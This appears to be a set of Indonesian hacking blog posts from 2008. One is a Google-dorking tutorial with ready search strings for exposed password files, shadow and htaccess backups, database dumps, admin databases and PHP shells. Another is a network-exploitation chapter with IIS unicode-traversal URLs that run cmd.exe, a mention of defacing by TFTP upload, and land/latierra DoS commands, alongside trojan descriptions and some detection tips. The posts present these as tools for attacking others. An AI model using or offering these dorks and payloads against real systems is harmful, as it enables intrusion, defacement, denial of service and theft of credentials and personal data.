Anda tinggal menghilangkan Variabel yang tidak anda inginkan atau
menambahkan apapun disana. Semuanya terserah kepada anda :D
Berikut merupakan script default pencarian google.

--- BOF google.html ---

--- EOF google.html ---

Google masih terus dikembangkan. Untuk melihat apa yang sedang
dikembangkan Google. Anda bisa ke http://labs.google.com

--- 04 // Tips & Tricks --------------------------------------------------

Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan
operator-operator tersebut.

Ex:
- Keyword: site:echo.or.id, menghasilkan semua site echo.or.id. Kemudian
anda bisa mencoba keyword: site:echo.or.id hacker, akan menghasilkan
semua site echo.or.id yang mengandung kata hacker.

Kita juga dapat melakukan pencarian secara spesifik melalui google.
Untuk melakukannya anda dapat ke site berikut:
- http://www.google.com/bsd
- http://www.google.com/mac
- http://www.google.com/linux
- http://www.google.com/microsoft
- http://www.google.com/univ/education

Berbagai trik keyword pada Google:
parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

intitle:index of intitle:mp3 -html -htm name size
intitle:index of intitle:video -html -htm name size
intitle:index of intitle:cgi-bin passwd -html -htm name size
intitle:index of intitle:cgi-bin password -html -htm name size

inurl:"admin.mdb" -html
inurl:"password.mdb" -html
inurl:"data.mdb" -html
"phpMyAdmin" "running on" inurl:"main.php"
intitle:"PHP Shell" "Enable stderr" php

Masih banyak lagi keyword yang bisa ditemukan disini [5] :D

--- 05 // Referensi ------------------------------------------------------

[1] http://www.google.com/help/basics.html
[2] http://www.google.com/help/features.html
[3] http://www.google.com/help/refinesearch.html
[4] http://www.google.com/help/interpret.html
[5] http://johnny.ihackstuff.com/
[6] O'Reilly - Google Hacks

Eksploitasi keamanan jaringan

2008-02-01T03:28:00.000-08:00

Eksploitasi keamanan jaringan
Yang MoSTiNG 18NuX THe BRiGHTSiDe Jam 11:16
Dalam bagian ini akan dibahas beberapa contoh eksploitasi lubang keamanan. Contoh-contoh yang dibahas ada yan bersifat umum dan ada yang bersifat khusus untuk satu jenis operating system tertentu, atau untuk program tertentu dengan versi tertentu. Biasanya lubang keamanan ini sudah ditutup pada versi baru dari paket program tersebut sehingga mungkin tidak dapat anda coba. Pembahasan dalam bab ini tentunya tidak komplit dikarenakan batasan jumlah halaman. Jika diinginkan pembahasan yang lebih komplit ada buku “Hacking Exposed” (lihat referensi [36]) yang dapat digunakan untuk keperluan tersebut.
Menurut “Hacking Exposed”, metodologi dari penyusup biasanya mengikuti langkah sebagai berikut: • Target acquisition and information gaterhing • Initial access • Privilege escalation • Covering tracks
Namun, bagian ini belum disusun dengan urutan seperti di atas. Sebelum melakukan penyerangan, seorang cracker biasanya mencari informasi tentang targetnya. Banyak informasi tentang sebuah sistem yang dapat diperoleh dari Internet. Sebagai contoh, informasi dari DNS (Domain Name System) kadang-kadang terlalu berlebihan sehingga memberikan terlalu banyak informasi kepada orang yang bermaksud jahat. DNS dapat memberikan informasi tentang nama-nama server berserta nomor IP yang dimiliki oleh sebuah perusahaan. Seseorang yang tidak tahu apa-apa, dengan mengetahui domain dari sebuah perusahaan dapat mengetahui informasi yang lebih banyak tentang server-server dari perusahaan tersebut. Paling tidak, informasi tentang name server merupakan informasi awal yang dapat berguna.
Informasi tentang DNS tersedia secara terbuka di Internet dan dapat dicari dengan menggunakan berbagai tools seperti: • whois, host, nslookup, dig (tools di sistem UNIX) • Sam Spade (tools di sistem Windows) • web dari Network Solutions inc. yang menyediakan informasi tentang data-data gTLD (.com, .net, .org, dan seterusnya) melalui webnya di http://www.networksolutions.com
Host, Whois, dig Berikut ini adalah contoh beberapa session untuk mencari informasi tentang domain dan server-server yang digunakan oleh domain tersebut. Untuk mencari name server, dapat digunakan program “host” dengan option “-t ns”. Sementara itu untuk mencari nomor IP dari sebuah host, langsun gunakan program host tanpa option. unix$ host -t ns yahoo.com yahoo.com NS NS3.EUROPE.yahoo.com yahoo.com NS NS1.yahoo.com yahoo.com NS NS5.DCX.yahoo.com unix$ host ns1.yahoo.com
ns1.yahoo.com A 204.71.200.33 Cara yang sama dapat dilakukan dengan menggunakan program whois. Contoh di bawah ini adalah untuk mencari informasi tentang domain yahoo.com dengan menggunakan server whois yang berada di Network Solutions Inc. unix$ whois -h whois.networksolutions.com yahoo.com Registrant: Yahoo (YAHOO-DOM) 3420 Central Expressway Santa Clara, CA 95051 US Domain Name: YAHOO.COM Administrative Contact, Technical Contact: Balling, Derek (DJB470) tech-contact@YAHOO-INC.COM Yahoo! 701 First Ave Sunnyvale, CA 94089 US +1-408-349-5062 Billing Contact: Billing, Domain (DB28833) domainbilling@YAHOO-INC.COM Yahoo! Inc. 225 Broadway, 13th Floor San Diego, CA 92101 1-408-731-3300 Record last updated on 28-Jun-2001. Record expires on 20-Jan-2010. Record created on 18-Jan-1995. Database last updated on 20-Jul-2001 00:12:00 EDT. Domain servers in listed order: NS1.YAHOO.COM 204.71.200.33 NS5.DCX.YAHOO.COM 216.32.74.10 NS3.EUROPE.YAHOO.COM 217.12.4.71 Informasi yang diperoleh dari contoh di atas sekedar mencari informasi mengenai server DNS. Kita juga dapat mencoba mencari informasi lebih jauh dengan cara mengambil (dump) semua data-data DNS yang dikenal dengan istilah zone transfer. Program “dig” dapat kita gunakan untuk keperluan tersebut.
unix$ dig yahoo.com. axfr @ns1.yahoo.com.
Contoh di atas adalah perintah untuk melakukan zone transfer (axfr) terhadap domain yahoo.com dari server ns1.yahoo.com. Perhatikan tanda titik (.) di belakang nama domain. Perlu diingat bahwa kegiatan zone transfer di beberapa tempat dapat dikategorikan sebagai tidak ramah (unfriendly) dan bahkan dianggak sebagai usaha untuk melakukan hacking terhadap sistem tersebut.
Untuk sistem yang diamankan secara baik, perintah zone transfer di atas akan gagal untuk dilakukan. Akan tetapi untuk sistem yang tidak baik, perintah di atas akan memberikan informasi tentang nama server-server yang berada dalam domain tersebut. Termasuk server di Intranet! (seperti billing, terminal server, RAS, dan sebagainya). Informasi yang sensitif seperti ini seharusnya tidak dapat di-query oleh orang atau server yang tidak berhak. Query zone transfer ini juga dapat dijadikan DoS attack karena dengan query yang sedikit (berdasarkan jumlah dan ukuran paket yang dikirimkan) dia menghasilkan jawaban yang cukup panjang. Dengan kata lain terjadi amplifikasi dari penggunaan bandwidth jaringan. Periksa sistem anda apakah DNS anda sudah dikelola dengan baik atau masih terbuka untuk zone transfer.
Sam Spade, utility untuk MS Windows Untuk anda yang menggunakan sistem yang berbasis Microsoft Windows, anda dapat menggunakan program Sam Spade. Program ini dapat diperoleh secara gratis dari web http://www.samspade.org. Gambar berikut menunjukkan sebuah sesi Sam Spade untuk mencari informasi tentang domain INDOCISC.com. Informasi DNS memang tersedia untuk umum. Akan tetapi seharusnya informasi yang komplit hanya boleh dilihat oleh server tertentu. Istilahnya, “zone transfer” hanya diperbolehkan untuk server tertentu saja. Eksploitasi Web Server Web server menyediakan jasa untuk publik. Dengan demikian dia harus berada di depan publik. Sayangnya banyak lubang keamanan dalam implementasi beberapa web server. Di bagian ini akan dicontohkan beberapa eksploitasi tersebut.
Defacing Microsoft IIS Salah satu lubang keamanan dari web yang berbasis IIS adalah adanya program atau script yang kurang baik implementasinya. Sebagai contoh, bugtraq id 1806 menujukkan cara untuk melihat isi direktori dari sebuah web server yang berbasis IIS. (Informasi lengkapnya ada di :
http://www.securityfocus.com/bid/1806.
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
Perintah di atas menjalankan perintah “dir” untuk melihat direktori di
server IIS tersebut. Selain melihat direktori dengan perintah “dir”, anda
dapat jugamenjalankan perintah lain di server tersebut, seperti misalnya
meng-copy file. Salah satu exploit adalah dengan mengambil file dari sebuah
tempat dengan “TFTP” ke server IIS tersebut. Prinsipnya adalah menggunakan perintah yang command line sebagai perintah “dir” tersebut, seperti dnegan printah “tftp” dan menggantikan spasi dengan tanda tambah (+). Setelah itu, file dapat ditempatkan dimana saja termasuk di direktori yang digunakan untuk memberikan layanan web. Atau dengan kata lain web tersebut dapat diubah (deface). Denial of Service Attack “Denial of Service (DoS) attack” merupakan sebuah usaha (dalam bentuk serangan) untuk melumpuhkan sistem yang dijadikan target sehingga sistem tersebut tidak dapat menyediakan servis-servisnya (denial of service) atau tingkat servis menurun dengan drastis. Cara untuk melumpuhkan dapat bermacam-macam dan akibatnyapun dapat beragam. Sistem yang diserang dapat menjadi “bengong” (hang, crash), tidak berfungsi, atau turun kinerjanya (beban CPU tinggi). Serangan denial of service berbeda dengan kejahatan pencurian data atau kejahatan memonitor informasi yang lalu lalang. Dalam serangan DoS tidak ada yang dicuri. Akan tetapi, serangan DoS dapat mengakibatkan kerugian finansial. Sebagai contoh apabila sistem yang diserang merupakan server yang menangani transaksi “commerce”, maka apabila server tersebut tidak berfungsi, transaksi tidak dapat dilangsungkan. Bayangkan apabila sebuah bank diserang oleh bank saingan dengan melumpuhkan outlet ATM (Anjungan Tunai Mandiri, Automatic Teller Machine) yang dimiliki oleh bank tersebut. Atau sebuah credit card merchant server yang diserang sehingga tidak dapat menerima pembayaran melalui credit card. Selain itu, serangan DoS sering digunakan sebagai bagian dari serangan lainnya. Misalnya, dalam serangan IPspoofing (seolah serangan datang dari tempat lain dengan nomor IP milik orang lain), seringkali DoS digunakan untuk membungkam server yang akan dispoof.
Land attack Land attack merupakan serangan kepada sistem dengan menggunakan program yang bernama “land”. Apabila serangan diarahkan kepada sistem Windows 95, maka sistem yang tidak diproteksi akan menjadi hang (dan bisa keluar layar biru). Demikian pula apabila serangan diarahkan ke beberapa jenis UNIX versi lama, maka sistem akan hang. Jika serangan diarahkan ke sistem Windows NT, maka sistem akan sibuk dengan penggunaan CPU mencapai 100% untuk beberapa saat sehingga sistem terlihat seperti macet. Dapat dibayangkan apabila hal ini dilakukan secara berulang-ulang. Serangan land ini membutuhkan nomor IP dan nomor port dari server yang dituju. Untuk sistem Windows, biasanya port 139 yang digunakan untuk menyerang. Program land menyerang server yang dituju dengan mengirimkan packet palsu yang seolah-olah berasal dari server yang dituju. Dengan kata lain, source dan destination dari packet dibuat seakan-akan berasal dari server yang dituju. Akibatnya server yang diserang menjadi bingung.
unix# ./land 192.168.1.1 139 land.c by m3lt, FLC 192.168.1.1:139 landed
Latierra Program latierra merupakan “perbaikan” dari program land, dimana port yang digunakan berubah-ubah sehingga menyulitkan bagi pengamanan. latierra v1.0b by MondoMan (elmondo@usa.net), KeG Enhanced version of land.c originally developed by m3lt, FLC Arguments: * -i dest_ip = destination ip address such as 1.1.1.1 If last octet is '-', then the address will increment from 1 to 254 (Class C) on the next loop and loop must be > 1 or -5 (forever). Alternatives = zone=filename.txt or list=filename.txt (ASCII) For list of alternative options, use -a instead of -h. * -b port# = beginning port number (required). -e port# = ending port number (optional) -t = tcp flag options (f=fin, ~s=syn, r=reset, ~p=push, a=ack,u=urgent) -v = time_to_live value, default=255 -p protocol = ~6=tcp, 17=udp, use -p option for complete list -w window_size = value from 0 to ?, default=65000 -q tcp_sequence_number, default=3868 -m message_type (~0=none, 1=Out-Of-Band, 4=Msg_DontRoute -s seconds = delay between port numbers, default=1 -o 1 = supress additional output to screen, default=0 -l loop = times to loop through ports/scan, default=1, -5=forever * = required ~ = default parameter values unix# ./latierra -i 192.167.1.1 -b 139 -e 141
latierra v1.0b by MondoMan (elmondo@usa.net), KeG Enhanced version of land.c originally developed by m3lt, FLC Settings: (-i) Dest. IP Addr : 192.168.1.1 (-b) Beginning Port #: 139 (-e) Ending Port # : 141 (-s) Seconds to Pause: 1 (-l) Loop : 1 (-w) Window size : 65000 (-q) Sequence Number : F1C (3868) (-v) Time-to-Live : 255 (-p) IP Protocol # : 6 (-t) TCP flags : syn push Done.
Ping-o-death Ping-o-death sebetulnya adalah eksploitasi program ping dengan memberikan packet yang ukurannya besar ke sistem yang dituju. Beberapa sistem UNIX ternyata menjadi hang ketika diserang dengan cara ini. Program ping umum terdapat di berbagai operating system, meskipun umumnya program ping tersebut mengirimkan packet dengan ukuran kecil (tertentu) dan tidak memiliki fasilitas untuk mengubah besarnya packet. Salah satu implementasi program ping yang dapat digunakan untuk mengubah ukuran packet adalah program ping yang ada di sistem Windows 95.
Ping broadcast (smurf) Salah satu mekanisme serangan yang baru-baru ini mulai marak digunakan adalah menggunakan ping ke alamat broadcast, ini yang sering disebut dengan smurf. Seluruh komputer (device) yang berada di alamat broadcast tersebut akan menjawab. Apakah ini merupakan standar? Jika sebuah sistem memiliki banyak komputer (device) dan ping broadcast ini dilakukan terus menerus, jaringan dapat dipenuhi oleh respon-respon dari device-device tersebut. Akibatnya jaringan menjadi lambat.
$ ping 192.168.1.255 PING 192.168.1.255 (192.168.1.255): 56 data bytes 64 bytes from 192.168.1.4: icmp_seq=0 ttl=64 time=2.6 ms 64 bytes from 192.168.1.2: icmp_seq=0 ttl=255 time=24.0 ms (DUP!) 64 bytes from 192.168.1.4: icmp_seq=1 ttl=64 time=2.5 ms 64 bytes from 192.168.1.2: icmp_seq=1 ttl=255 time=4.7 ms (DUP!) 64 bytes from 192.168.1.4: icmp_seq=2 ttl=64 time=2.5 ms 64 bytes from 192.168.1.2: icmp_seq=2 ttl=255 time=4.7 ms (DUP!) 64 bytes from 192.168.1.4: icmp_seq=3 ttl=64 time=2.5 ms 64 bytes from 192.168.1.2: icmp_seq=3 ttl=255 time=4.7 ms (DUP!) --- 192.168.1.255 ping statistics --- 4 packets transmitted, 4 packets received, +4 duplicates, 0% packet loss round-trip min/avg/max = 2.5/6.0/24.0 ms
Smurf attack biasanya dilakukan dengan menggunakan IP spoofing, yaitu mengubah nomor IP dari datangnya request, tidak seperti contoh di atas. Dengan menggunakan IP spoofing, respon dari ping tadi dialamatkan ke komputer yang IPnya dispoof. Akibatnya komputer tersebut akan menerima banyak paket. Hal ini dapat mengakibatkan pemborosan penggunaan (bandwidth) jaringan yang menghubungkan komputer tersebut. Dapat dibayangkan apabila komputer yang dispoof tersebut memiliki hubungan yang berkecepatan rendah dan ping diarahkan ke sistem yang memiliki banyak host. Hal ini dapat mengakibatkan DoS attack.
Contoh-contoh DoS attack lainnya • Program “ping.exe” di sistem Windows (dicobakan pada Windows NT 4 Service Pack 4) dapat digunakan untuk menghentikan beberapa aplikasi sistem Windows jika diberikan nama host yang panjangnya lebih dari 112 karakter. Aplikasi dialup akan mati. Eksploitasi ini membutuhkan user di local server.
http://www.securitytracker.com/alerts/2001/Apr/1001255.html Sniffer Program sniffer adalah program yang dapat digunakan untuk menyadap data dan informasi melalui jaringan komputer. Di tangan seorang admin, program sniffer sangat bermanfaat untuk mencari (debug) kesalahan di jaringan atau untuk memantau adanya serangan. Di tangan cracker, program sniffer dapat digunakan untuk menyadap password (jika dikirimkan dalam bentuk clear text).
Sniffit Program sniffit dijalankan dengan userid root (atau program dapat di-setuid root sehingga dapat dijalankan oleh siapa saja) dan dapat menyadap data. Untuk contoh penggunaan sniffit, silahkan baca dokumentasi yang menyertainya. (Versi berikut dari buku ini akan menyediakan informasi tentang penggunaannya.)
tcpdump Program tcpdump merupakan program gratis yang umum digunakan untuk menangkap paket di sistem UNIX. Implementasi untuk sistem Window juga tersedia dengan nama windump. Setelah ditangkap, data-data (paket) ini dapat diolah dengan program lainnya, seperti dengan menggunakan program tcpshow, tcptrace, dan sejenisnya. Program tcpdump sangat powerful dan digunakan sebagai basis dari pembahasan di beberapa buku, seperti buku seri “TCP/IP Illustrated” dari Richard Stevens [41] yang sangat terkenal atau buku “Network Intrusion Detection” [28]. Berikut ini adalah contoh sebuah sesi tcpdump.
unix# tcpdump 06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: S 616175183:616175183(0) win 5840 (DF) 06:46:31.318893 192.168.1.1.80 > 192.168.1.7.1043: S 1312015909:1312015909(0) ack 616175184 win 32736 06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: . ack 1 win 5840 (DF) 06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: P 1:296(295) ack 1 win 5840 (DF) 06:46:31.338893 192.168.1.1.80 > 192.168.1.7.1043: . ack 296 win 32441 (DF) 06:46:31.738893 192.168.1.1.80 > 192.168.1.7.1043: P
1:200(199) ack 296 win 32736 (DF) 06:46:31.868893 192.168.1.7.1043 > 192.168.1.1.80: . ack 200 win 5641 (DF) 06:46:31.898893 192.168.1.1.1492 > 192.168.1.7.113: S 2035772989:2035772989(0) win 512 06:46:31.898893 192.168.1.7.113 > 192.168.1.1.1492: R 0:0(0)ack 2035772990 win 0 06:46:39.028893 192.168.1.7 > 192.168.1.1: icmp: echo request 06:46:39.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply 06:46:40.028893 192.168.1.7 > 192.168.1.1: icmp: echo request 06:46:40.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply 06:46:41.028893 192.168.1.7 > 192.168.1.1: icmp: echo request 06:46:41.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply 06:46:42.038893 192.168.1.7 > 192.168.1.1: icmp: echo request 06:46:42.038893 192.168.1.1 > 192.168.1.7: icmp: echo reply 06:46:44.048893 192.168.1.7.1043 > 192.168.1.1.80: P 296:591(295) ack 200 win 5641 (DF) 06:46:44.048893 192.168.1.1.80 > 192.168.1.7.1043: P 200:398(198) ack 591 win 32736 (DF) 06:46:44.168893 192.168.1.7.1043 > 192.168.1.1.80: . ack 398 win 5443 (DF)
Dalam contoh di atas, pada baris-baris pertama, ditunjukkan sebuah sesi web browsing (lihat port 80 yang digunakan sebagai target port) dari sebuah komputer dengan nomor IP 192.168.1.7 ke server web dengan nomor IP 192.168.1.1. Di sesi itu nampak three way handshaking (paket SYN, dibalas dengan SYN/ACK, dan dibalas dengan ACK). Untuk mengetahui lebih lengkap tentang paket-paket ini, silahkan baca buku “TCP/IP Illustrated” dari Richard Stevens atau buku “Network Intrusion Detection” (Stephen Northcutt & Judy Novak). Selain sesi web, nampak juga sesi ping dimana ada paket “ICMP echo request” yang dibalas dengan paket “ICMP echo reply”. Ping ini juga dikirimkan dari IP 192.168.1.7 ke komputer dengan IP 192.168.1.1.
Sniffer Pro Sniffer Pro merupakan program sniffer komersial yang berjalan di sistem Windows. Program ini dibuat oleh Network Associates dan cukup lengkap fasilitasnya. Sniffer Pro dapat menangkap packet dengan aturan-aturan (rules) tertentu. Bahkan dia dilengkapi dengan visualisasi yang sangat menarik dan membantu administrator.
Anti Sniffer Untuk menutup lubang keamanan dari kegiatan sniffing, administrator dapat membuat jaringannya bersegmen dan menggunakan perangkat switch sebagai pengganti hub biasa. Selain itu dapat juga digunakan program untuk mendeteksi adanya penggunaan sniffer di jaringan yang dikelolanya. Program pendeteksi sniffer ini disebut anti-sniffer. Program anti-sniffer bekerja dengan mengirimkan packet palsu ke dalam jaringan dan mendeteksi responnya. Ethernetcard yang diset ke dalam promiscuous mode (yang umumnya digunakan ketika melakukan sniffing) dan program yang digunakan untuk menyadap sering memberikan jawaban atas packet palsu ini. Dengan adanya jawaban tersebut dapat diketahui bahwa ada yang melakukan kegiatan sniffing.
Trojan Horse Trojan horse di sistem komputer adalah program yang disisipkan tanpa pengetahuan si pemilik komputer. Trojan horse ini kemudian dapat diaktifkan dan dikendalikan dari jarak jauh, atau dengan menggunakan timer (pewaktu). Akibatnya, komputer yang disisipi trojan horse tersebut dapat dikendalikan dari jarak jauh. Ada yang mengatakan bahwa sebetulnya program ini mirip remote administration. Memang sifat dan fungsinya sama. Remote administration / access program seperti pcAnywhere digunakan untuk keperluan yang benar (legitimate). Sementara trojan horse biasanya digunakan untuk keperluan yang negatif. Back Orifice (BO) Back Orifice (BO) merupakan trojan horse untuk sistem yang menggunakan operating system Windows (95, 98, NT, 2000). BO Merupakan produk dari Cult of the Dead Cow, pertama kali dikeluarkan 3 Agustus 1998 dan sangat populer di kalangan bawah tanah. Pada saat dokumen ini ditulis, telah keluar BO 2000 untuk sistem operasi Windows 2000. BO terdiri dari server (yang dipasang atau disisipkan di komputer target) dan client (yang digunakan untuk mengendalikan server). Akses ke server BO dapat diproteksi dengan menggunakan password sehingga mengecohkan atau membatasi akses oleh orang lain. Dengan menggunakan BO, intruder dapat mengirimkan pesan sesuai dengan yang kita inginkan. Mengirim pesan mungkin tidak terlalu bermasalah, meskipun menggangu. Bayangkan jika intruder tersebut memformat harddisk anda atau menangkan keystroke anda (apalagi kalau anda menuliskan userid dan password). Server BO menggunakan TCP/IP dan menunggu di port 31337. Jika di komputer anda port tersebut terbuka, ada kemungkinan BO sudah terpasang di sana. Namun, nomor port dari BO dapat dipindahkan ke nomor port lain sehingga mengelabui administrator. Mendeteksi BO Gunakan program "REGEDIT" dan cari
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
Jika variabel tersebut berisi, maka anda sudah terkena BO. Catatan: nama file adalah space-dot-exe. Cek di direktory "Windows\SYSTEM\" jika ada nama file yang kosong atau titik, dan ukurannya (sama dengan atau lebih besar dari) 122KB, kemungkinan itu BO. File tersebut tidak dapat dihapus begitu saja. Sumber informasi tentang BO dapat diperoleh dari : • http://www.nwi.net/~pchelp/bo/bo.html • http://www.bo2k.com • http://www.iss.net/xforce/alerts/advise5.html
NetBus NetBus merupakan trojan horse yang mirip Back Orifice. NetBus dapat digunakan untuk mengelola komputer Windows 95/98/NT dari jarak jauh untuk mengakses data dan fungsi dari komputer tersebut. NetBus terdiri dari client dan server. Versi 1.60 dari NetBus server adalah Windows PE file yang bernama PATCH.EXE. Jika dia terpasang (installed) maka dia akan langsung dijalankan ketika komputer di"StartUp". Eksekusi dari server ada di HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run Porsi dari server NetBus cukup canggih dimana dia menghilangkan jejaknya dari daftar proses yang jalan, dan tidak memperbolehkan dirinya dihapus atau di"rename". Jika server tersebut dijalankan dengan menggunakan "/remove", maka dia akan menghilangkan diri (remove) dari sistem itu. Porsi client digunakan untuk mengendalikan komputer yang sudah terpasang NetBus. Komunikasi dilakukan dengan menggunakan TCP/IP. Client dapat melakukan port scanning untuk mencari dimana server berada. NetBus dapat mengirimkan "keystroke" seolah-olah user yang mengetikkannya di depan layar, dan juga dapat menangkap "keystroke" serta menyimpannya dalam sebuah berkas. Pengamanan terhadap serangan NetBus dapat dilakukan dengan menggunakan program Busjacker dan F-Secure. Informasi mengenai NetBus dapat diperoleh di http://www.netbus.org.

Hacking with google

2008-02-01T03:27:00.000-08:00

Diam diam, site ini memberikan kita tools untuk melakukan hacking yang paling berbahaya se antero dunia, walaupun tools google ini hanya bisa memberikan sampai ke level footprinting ada juga yang bisa sampai ke level selanjutnya. kenapa aku sebut dengan tools ? karna kita menggunakan google untuk mencari media yang unsecure, yang mudah di hack yang bolong, yang belum ter update, karna google memiliki kekuatan untuk itu semua.
dari tutorial ini yang akan didapatkan adalah:
Bagaimana cara menggunakan google untuk mencari sources dari personal information dan confidential data lainya
Bagaimana cara mencari informasi tentang vulnerable systems and Web services
Bagaimana cara mencari publicly available network devices.
Hal pertama dari yang harus di ketahui adalah Google Query Operators
Query operator ini berfungsi kasar sebagai filtering search nya google menjadi lebih spesifik berdasarkan query yang kita inginkan, masing masing query memiliki fungsi sendiri sendiri. berikut keterangan dan contong nya….
site
memfilter berdasarkan domain yang ada
contoh: site:google.com fox —> akan mencari kata fox di situs google.com
intitle
Memfilter dokumen yang memiliki title yang spesifik
contoh: intitle:fox fire —> akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire
allintitle
Memfilter dokumen untuk mencari intitle intile
contoh: allintitle:fox fire —> akan mencari semua site yang memiliki title fox dan yang memiliki title fire atau = intitle:fox intitle:fire
inurl
Memfilter pencarian dengan url yang spesifik
contoh: inurl:fox fire —> akan mencari kata fire di website yang url nya terdapat fox
allinurl
Sama dengan Allintitle (hanya ini url)
filetype, ext
Memfilter pencarian untuk dokumen yang spesifik
contoh: filetype:pdf fire —> akan mencari file PDF yang didalamnya terdapat kata fire
contoh keren: filetype:doc skripsi IT
numrange
Memfilter dokumen berdasarkan range tertentu
contoh: numrange:1-100 fire —> akan mencari range 1-100 yang terdapat kata fire
link
Memfilter site site yang memiliki link terhadap site tertentu
contoh: link:www.google.com —> akan mencari site site mana aja yang memiliki links ke google.com
inanchor
Memfilter berdasarkan site description yang ada
contoh: inanchor:fire —> akan mencari web yang memiliki deskripsi fire
kira kira itulah query query google yang keren keren, sisanya ada sih, seperti:
/ * - + “” ( ya ini regular ekspression biasa kan, jadi ngga perlu di jelaskan lebih detail )
nah, dari situ, kia bisa kreasikan ke berbagai macam jenis query untuk memfilter sesuatu, bahkan ke sesuatu yang lebih dalam, misalnya file database……
Web Server
untuk mencari target dengan mudah dilakukan google dengan menggunakan sintaks berikut ini:
“Apache/1.3.28 Server at” intitle:index.of
–> Apache 1.3.28
“Apache/2.0 Server at” intitle:index.of
–> Apache 2.0
“Apache/* Server at” intitle:index.of
–> semua versi dari Apache
“Microsoft-IIS/4.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 4.0
“Microsoft-IIS/5.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 5.0
“Microsoft-IIS/6.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 6.0
“Microsoft-IIS/* Server at” intitle:index.of
–> semua versi dari Microsoft Internet Information Services
“Oracle HTTP Server/* Server at” intitle:index.of
–> semua versi dari Oracle HTTP Server
“IBM _ HTTP _ Server/* * Server at” intitle:index.of
–> semua versi dari IBM HTTP Server
“Netscape/* Server at” intitle:index.of
–> semua versi dari Netscape Server
“Red Hat Secure/*” intitle:index.of
–> semua versi dari the Red Hat Secure server
“HP Apache-based Web Server/*” intitle:index.of
–> semua versi dari the HP server
Beberapa Bug pada Skripts dapat ditemukan google:
“Generated by phpSystem”
–> dapat menemukan operating system type and version, hardware configuration, logged users, open connections, free memory dan disk space, mount points
“This summary was generated by wwwstat”
–> web server statistics, system file structure
“These statistics were produced by getstats”
–>web server statistics, system file structure
“This report was generated by WebLog”
–>web server statistics, system file structure
intext:”Tobias Oetiker” “traffic analysis”
–>system performance statistics as MRTG charts, network configuration
intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
–>server version, operating system type, child process list,current connections
intitle:”ASP Stats Generator *.*” “
–>ASP Stats
Generator” “2003-2004 weppos”
–>web server activity, lots of visitor information
intitle:”Multimon UPS status page”
–>UPS device performance statistics
intitle:”statistics of” “advanced web statistics”
–>web server statistics, visitor information
intitle:”System Statistics” +”System and Network Information Center”
–>system performance statistics as MRTG charts, hardware configuration, running services
intitle:”Usage Statistics for” “Generated by Webalizer”
–>web server statistics, visitor information, system file structure
intitle:”Web Server Statistics for ****”
–>web server statistics, visitor information
inurl:”/axs/ax-admin.pl” -script
–>web server statistics, visitor information
inurl:”/cricket/grapher.cgi”
–>MRTG charts of network interface performance
inurl:server-info “Apache Server Information”
–>web server version and configuration, operating system type, system file structure
“Output produced by SysWatch *”
–>operating system type and version, logged users, free memory and disk space, mount points, running processes,system logs
Error message queries
Salah satu kumpulan error message query, dapat ditemukan sehingga kita bisa mulai melakukan hacking pada tahap selanjutnya.
“A syntax error has occurred” filetype:ihtml
–>Informix database errors, berpotensial untuk mengambil function names, filenames, file structure information, pieces of SQL code and passwords
“Access denied for user” “Using password”
–>authorisation errors, berpotensial untuk mengambil user names, function names, file structure information and pieces of SQL code
“The script whose uid is ” “is not allowed to access”
–>access-related PHP errors, berpotensial untuk mengambil filenames, function names and file structure information
“ORA-00921: unexpected end of SQL command”
–>Oracle database errors, berpotensial untuk mengambil filenames, function names and file structure information
“error found handling the request” cocoon filetype:xml
–>Cocoon errors, berpotensial untuk mengambil Cocoon version information, filenames, function names and file structure information
“Invision Power Board Database Error”
–>Invision Power Board bulletin board errors, berpotensial untuk mengambil function names, filenames, file structure information and piece of SQL code
“Warning: mysql _ query()” “invalid query”
–>MySQL database errors, berpotensial untuk mengambil user names, function names, filenames and file structure information
“Error Message : Error loading required libraries.”
–>CGI script errors, berpotensial untuk mengambil information about operating system and program versions, user names, filenames and file structure information
“#mysql dump” filetype:sql
–>MySQL database errors, berpotensial untuk mengambil informasi database structure dan contents
Google queries untuk mencari lokasi passwords
kumpulan secara garis besar lokasi password sebuah sistem yang dapat diakses oleh google
“http://*:*@www”
site passwords for site, stored as the string
“http://username: password@www…” filetype:bak inurl:”htaccess|passwd|shadow|ht users”
file backups, berpotensial untuk mengambil user names and passwords
filetype:mdb inurl:”account|users|admin|administrators|passwd|password”
mdb files, berpotensial untuk mengambil password information
intitle:”Index of” pwd.db
pwd.db files, berpotensial untuk mengambil user names and encrypted passwords
inurl:admin inurl:backup intitle:index.of
directories whose names contain the words admin and backup
“Index of/” “Parent Directory” “WS _ FTP.ini” filetype:ini WS _ FTP PWD
WS_FTP configuration files, berpotensial untuk mengambil FTP server access passwords
ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”
Terdapat Microsoft FrontPage passwords
filetype:sql (”passwd values ****” |”password values ****” | “pass values ****” )
Terdapat SQL code and passwords yang disimpan dalam a database
intitle:index.of trillian.ini
configuration files for the Trillian IM
